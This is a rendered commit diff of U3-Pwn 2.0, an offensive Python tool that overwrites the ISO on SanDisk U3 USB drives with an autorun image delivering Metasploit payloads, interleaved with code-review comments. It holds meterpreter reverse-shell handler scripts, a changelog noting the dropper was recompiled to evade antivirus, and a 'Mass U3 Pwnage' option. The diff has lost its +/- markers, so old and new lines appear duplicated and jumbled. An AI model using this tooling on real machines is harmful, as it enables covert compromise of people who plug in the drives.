Commit 71bddaed authored by Mati's avatar Mati

Imported Upstream version 2.0

parent 017edb4d
......@@ -8,7 +8,7 @@
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
......@@ -19,7 +19,7 @@
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
......@@ -38,6 +38,8 @@ chmod 755 metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run
ln -s /bin/mkisofs /bin/genisoimage
x64
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
......@@ -45,6 +47,10 @@ chmod 755 metasploit-latest-linux-x64-installer.run
./metasploit-latest-linux-x64-installer.run
ln -s /bin/mkisofs /bin/genisoimage
Kali Linux
Then cd U3-Pwn && python U3-pwn.py
apt-get update && apt-get -y install genisoimage
File mode changed from 100644 to 100755
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
\ No newline at end of file
use multi/handler
set payload windows/meterpreter/reverse_tcp_allports
set LPORT 1
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
set LPORT 3
exploit -j
set LPORT 4
exploit -j
use multi/handler
set payload windows/meterpreter/reverse_tcp_allports
set LPORT 1
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
set LPORT 3
exploit -j
set LPORT 4
exploit -j
exploit -j
set LPORT 5
exploit -j
set LPORT 6
exploit -j
File mode changed from 100644 to 100755
File mode changed from 100644 to 100755
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# about.py #
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
import os
import sys
import banner
try:
import os
import sys
import banner
except ImportError, error:
print'\n[-]Failed To Import Module\n'
print error
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
banner.print_banner()
print '''
U3-Pwn is a tool designed to automate injecting executerbles to Sandisk
smart usb devices with default U3 software install. This is performed by
removing the original iso file from the device and creating a new iso
with autorun features.
U3-Pwn is a tool designed to automate injecting executerbles to Sandisk
smart usb devices with default U3 software install. This is performed by
removing the original iso file from the device and creating a new iso
with autorun features.
Written by: Michael Johnson (Zy0d0x) @ http://www.nullsecurity.net
Written by: Michael Johnson (Zy0d0x) @ http://www.nullsecurity.net
Submit Bugs:zy0d0x at nullsecurity.net
Submit Bugs:zy0d0x at nullsecurity.net
DISCLAIMER: This is only for testing purposes and can only be used where,
strict consent has been given. Do not use this for illegal purposes period.
DISCLAIMER: This is only for testing purposes and can only be used where,
strict consent has been given. Do not use this for illegal purposes period.
'''
raw_input(''' Press any key to return to menu: ''')
raw_input(''' Press any key to return to menu: ''')
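Review bot: The `except ImportError, error:` handler around the imports only prints the error and falls through, so a failed `import banner` surfaces later as a NameError at `banner.print_banner()`; ending the handler with `sys.exit(1)` would make the failure explicit. `import banner` also sits above `sys.path.append('%s/src/' % definepath)`, so this module resolves it only if the caller has already extended `sys.path`. Because `definepath` is `os.getcwd()`, modules are loaded from whatever `src/` directory lies under the current working directory; deriving the directory from `__file__` would stop the tool from importing code out of an unintended location. The rendered page has lost its +/- markers, so this assumes the try/except form is the new side; the same import pattern shows up in the banner, change-log and compatibility-list sections.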
......@@ -2,24 +2,25 @@
# -*- coding: utf-8 -*-
try:
import os
except ImportError:
pass
except ImportError, error:
print'\n[-]Failed To Import Module\n'
print error
def print_banner():
os.system('clear')
print '''
~ .__ \xc2\xb0.__ 0 o ^ .__ \xc2\xb0__ `\xc2\xb4
\xc2\xb0____) __ __| | | \xc2\xb0| ______\xc2\xb0____ 0 ____ __ _________|__|/ |_ ___.__.
/ \\| | \xc2\xb0\\ |\xc2\xb0| | \xc2\xb0/ ___// __ \\_/ ___\\| | \xc2\xb0\\_ __ \\ o\\ __< | |
| o\xc2\xb0| \\ | / |_| |__\\___ \\ ___/\\ \xc2\xb0\\___| o| /| | \\/ || |\xc2\xb0 \\___ O|
|___| /____/|____/____/____ \xc2\xb0>\\___ >\\___ >____/ |__|\xc2\xb0 |__||__| / ____|
`\xc2\xb4\xc2\xb4`\xc2\xb4\\/\xc2\xb4`nullsecurity team`\xc2\xb4\\/`\xc2\xb4\xc2\xb4`\xc2\xb4\\/`\xc2\xb4``\xc2\xb4\\/ ``\xc2\xb4```\xc2\xb4```\xc2\xb4\xc2\xb4\xc2\xb4\xc2\xb4`\xc2\xb4``0_o\\/\xc2\xb4\xc2\xb4`\xc2\xb4\xc2\xb4
~ .__ \xc2\xb0.__ 0 o ^ .__ \xc2\xb0__ `\xc2\xb4
\xc2\xb0____) __ __| | | \xc2\xb0| ______\xc2\xb0____ 0 ____ __ _________|__|/ |_ ___.__.
/ \\| | \xc2\xb0\\ |\xc2\xb0| | \xc2\xb0/ ___// __ \\_/ ___\\| | \xc2\xb0\\_ __ \\ o\\ __< | |
| o\xc2\xb0| \\ | / |_| |__\\___ \\ ___/\\ \xc2\xb0\\___| o| /| | \\/ || |\xc2\xb0 \\___ O|
|___| /____/|____/____/____ \xc2\xb0>\\___ >\\___ >____/ |__|\xc2\xb0 |__||__| / ____|
`\xc2\xb4\xc2\xb4`\xc2\xb4\\/\xc2\xb4`nullsecurity team`\xc2\xb4\\/`\xc2\xb4\xc2\xb4`\xc2\xb4\\/`\xc2\xb4``\xc2\xb4\\/ ``\xc2\xb4```\xc2\xb4```\xc2\xb4\xc2\xb4\xc2\xb4\xc2\xb4`\xc2\xb4``0_o\\/\xc2\xb4\xc2\xb4`\xc2\xb4\xc2\xb4
************************************************************************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************************************
************************************************************************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************************************
'''
try:
import banner
import os
import sys
except ImportError:
print'\n[-]Failed To Import Module'
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
banner.print_banner()
print 'U3-Pwn Change Log'
print'''
===================================================================================
Rebult most of the tool, added more user imput sanitization (cheers Shadow Master)
Recompiled shellcodeexec to bypass av agian.
===================================================================================
'''
raw_input('Press Enter To Return To Menu..')
try:
import subprocess
import pexpect
import time
import os
import sys
import shutil
import banner
except ImportError:
pass
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
devlist=[]
devices=[1]
banner.print_banner()
for num in devices:
dev = raw_input("\nEnter the device to change iso image on (example sdb1):")
devlist.append(str(dev))
try:
banner.print_banner()
#format and create a new partition on virtual cd partition using u3-tool
print '\nCreating partition of 8058880 bytes on /dev/%s ' % devlist[0]
child1 = pexpect.spawn('u3-tool -v -p 8058880 /dev/' + devlist[0])
#Accepts warning that the device will be formatted
#WARNING: Loading a new cd image causes the whole device to be whiped. This INCLUDES the data partition.
#I repeat: ANY EXCISTING DATA WILL BE LOST!
#Are you sure you want to continue? [yn]
child1.sendline('y')
time.sleep(2)
#inserts new iso file to virtual rom devices using u3-tool
banner.print_banner()
print '\nInserting new iso file to /dev/%s\n' % devlist[0]
subprocess.Popen('u3-tool -l "/home/zy0d0x/programming/u3-pwn/src/system.iso" /dev/%s' % (devlist[0]), shell=True).wait()
banner.print_banner()
print '\nSuccessfully backed up /dev/%s' % devlist[0]
time.sleep(2)
except Exception, error:
print '\n[-]Something went wrong, printing error message..'
print error
time.sleep(2)
sys.exit(0)
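Review bot: The device name read with `raw_input` is formatted unchecked into the `shell=True` command on the `u3-tool -l` line, so shell metacharacters in the answer are interpreted by the shell of a tool that is presumably run as root. Validate the name first, for example `re.match(r'^sd[a-z]+[0-9]*$', dev)` (which needs `import re`), and pass an argument list without a shell: `subprocess.call(['u3-tool', '-l', iso_path, '/dev/' + dev])`. The ISO path `/home/zy0d0x/programming/u3-pwn/src/system.iso` is an absolute path on the author's machine and should be built from `definepath` instead. The `Successfully backed up` message is printed without checking u3-tool's exit status, and `except ImportError: pass` hides a missing `pexpect` until the first call fails.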
#!/usr/bin/env python
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# U3-Pwn #
# #
# DATE #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import os
import sys
import banner
except ImportError, error:
print'\n[-]Failed To Import Module\n'
print error
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
banner.print_banner()
print ' Compatibility List Of SanDisk U3 Devices'
print '''
VendorID | ProductID | Device Name
| |
0x0781 | 0x5406 | Sandisk Cruzer Micro
0x0781 | 0x5408 | Sandisk Cruzer Titanium
0x0781 | 0x550a | Sandisk Cruzer Pattern
0x0781 | 0x5151 | Sandisk Cruzer Micro Skin 8GB
0x0781 | 0x540e | Sandisk Cruzer Contour
0x0781 | 0x5530 | Sandisk Cruzer
0x0781 | 0x5535 | Sandisk Ultra Backup
'''
raw_input(' Press Enter To Return To Menu..')
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# deviceinfo.py #
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import subprocess
import pexpect
import time
import sys
import os
except ImportError:
pass
import sys
import shutil
import banner
except ImportError, error:
print'\n[-]Failed To Import Module\n'
print error
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
import banner
try:
banner.print_banner()
device = \
raw_input('''\nEnter the device to find information about (example /dev/sde1): '''
)
if device == '':
print '''[-]Error No Device Found'''
time.sleep(2)
else:
subprocess.Popen('u3-tool -D ' + device, shell=True).wait()
sys.exit(0)
except KeyboardInterrupt:
print ' Detecting Device...\n'
u3 = ['5406', '5408', '5151', '5530', '5535', '550a', '540e']
vendorid = '0781:'
for id in u3:
try:
device = subprocess.check_output("lsusb -d %s%s" %(vendorid,id), shell=True)
print ' Device Found:', device
except Exception, error:
pass
time.sleep(2)
banner.print_banner()
print ' Detecting Partitions...'
time.sleep(2)
partitionsFile = open("/proc/partitions")
lines = partitionsFile.readlines()[2:]
for line in lines:
words = [x.strip() for x in line.split()]
minorNumber = int(words[1])
deviceName = words[3]
if minorNumber % 16 == 0:
path = "/sys/class/block/" + deviceName
if os.path.islink(path):
if os.path.realpath(path).find("/usb") > 0:
if deviceName.startswith("sd"):
print "\n Partition Found: /dev/%s1" % deviceName
time.sleep(2)
print '''[-]Keyboard Interrupt Detected, Returning To Menu....'''
except KeyboardInterrupt:
print'\n[-]Keyboard Interrupted Exiting'
time.sleep(2)
sys.exit(0)
except Exception, error:
print '''[-]Something went wrong, printing error message....'''
print '[-]Something went wrong, printing error message..'
print error
time.sleep(2)
sys.exit(0)
try:
dev = deviceName
banner.print_banner()
if dev.startswith('sda'):
print 'No Devices Found'
time.sleep(2)
else:
print '\n=================================\n'
print '\nDevice information for /dev/%s\n' % deviceName
print '\n=================================\n'
p = subprocess.Popen('u3-tool -D /dev/%s' % (deviceName),shell=True).wait()
raw_input('\nPress Enter To Continue..')
except Exception, error:
print '[-]Something went wrong, printing error message..'
print error
time.sleep(2)
sys.exit(0)
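Review bot: After the `/proc/partitions` loop, `dev = deviceName` holds whichever entry was listed last, not the disk that passed the `/usb` and `sd` checks, so `u3-tool -D /dev/%s` can be run against an unrelated block device; `dev.startswith('sda')` is only a guess at "nothing found". Remember the match inside the innermost `if`, e.g. `found = deviceName`, and report no device when `found` was never set. `partitionsFile` is never closed (`with open("/proc/partitions") as partitionsFile:` would handle that), the loop variable `id` shadows the builtin, and `except Exception, error: pass` around `lsusb` hides a missing binary as well as a non-match. The rendered page has lost its +/- markers, so this assumes the detection loop is the new side.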
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# U3-Pwn.py #
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# 10/05/2013 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# - Python-2.7 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import subprocess
import time
......@@ -46,17 +45,17 @@ try:
banner.print_banner()
mainmenu = \
raw_input('''
U3-Pwn Main Menu:
U3-Pwn Main Menu:
1. Generate & Replace Iso Image.
2. Generate & Replace With Custom Exe.
3. Mass U3 Pwnage - Multi device attack.
4. Find Out U3 SanDisk Device Information.
5. Replace Iso Image With Original U3 Iso.
6. About U3-Pwn & Disclaimer.
7. Exit U3-Pwn.
1. Generate & Replace Iso Image.
2. Generate & Replace With Custom Exe.
3. Find Out U3 SanDisk Device Information.
4. Replace Iso Image With Original U3 Iso.
5. SanDisk Usb Compatibility List.
6. About U3-Pwn & Disclaimer.
7. Exit U3-Pwn.
Enter the number: ''')
Enter the number: ''').strip()
# Generate Single Iso & Replace Iso on SanDisk Device
......@@ -86,52 +85,50 @@ try:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Generate Single Iso & Replace Iso on Multiple SanDisk Device
# Get SanDisk Device Information
if mainmenu == '3':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(masspwnage)
reload(deviceinfo)
except Exception:
pass
import masspwnage
import deviceinfo
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Get SanDisk Device Information
# Replace Backdoored SanDisk Device With Original Iso File
if mainmenu == '4':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(deviceinfo)
reload(backup)
except Exception:
pass
import deviceinfo
import backup
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Replace Backdoored SanDisk Device With Original Iso File
# About & Disclaimer
if mainmenu == '5':
try:
sys.path.append('%s/src/' % definepath)
sys.path.append('%s/src/' % definepath)
try:
reload(backup)
reload(compat)
except Exception:
pass
import backup
import compat
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# About & Disclaimer
if mainmenu == '6':
if mainmenu == '6':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(about)
except Exception:
......@@ -140,6 +137,7 @@ try:
print '''[-]Returning to previous menu...'''
time.sleep(2)
if mainmenu == '7':
sys.exit()
except KeyboardInterrupt:
......
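Review bot: Each menu branch wraps `reload(deviceinfo)` (likewise `reload(backup)` and `reload(compat)`) in `except Exception: pass`, which is presumably there to absorb the NameError on first use but also silences any real failure raised while the module is re-executed. Narrowing it to `except NameError:` keeps the first-use behaviour and lets genuine errors surface. `sys.path.append('%s/src/' % definepath)` is repeated in every branch on every pass through the menu, so `sys.path` accumulates duplicates; appending once before the menu is enough. The enclosing `try:` and the menu loop start outside the visible hunks.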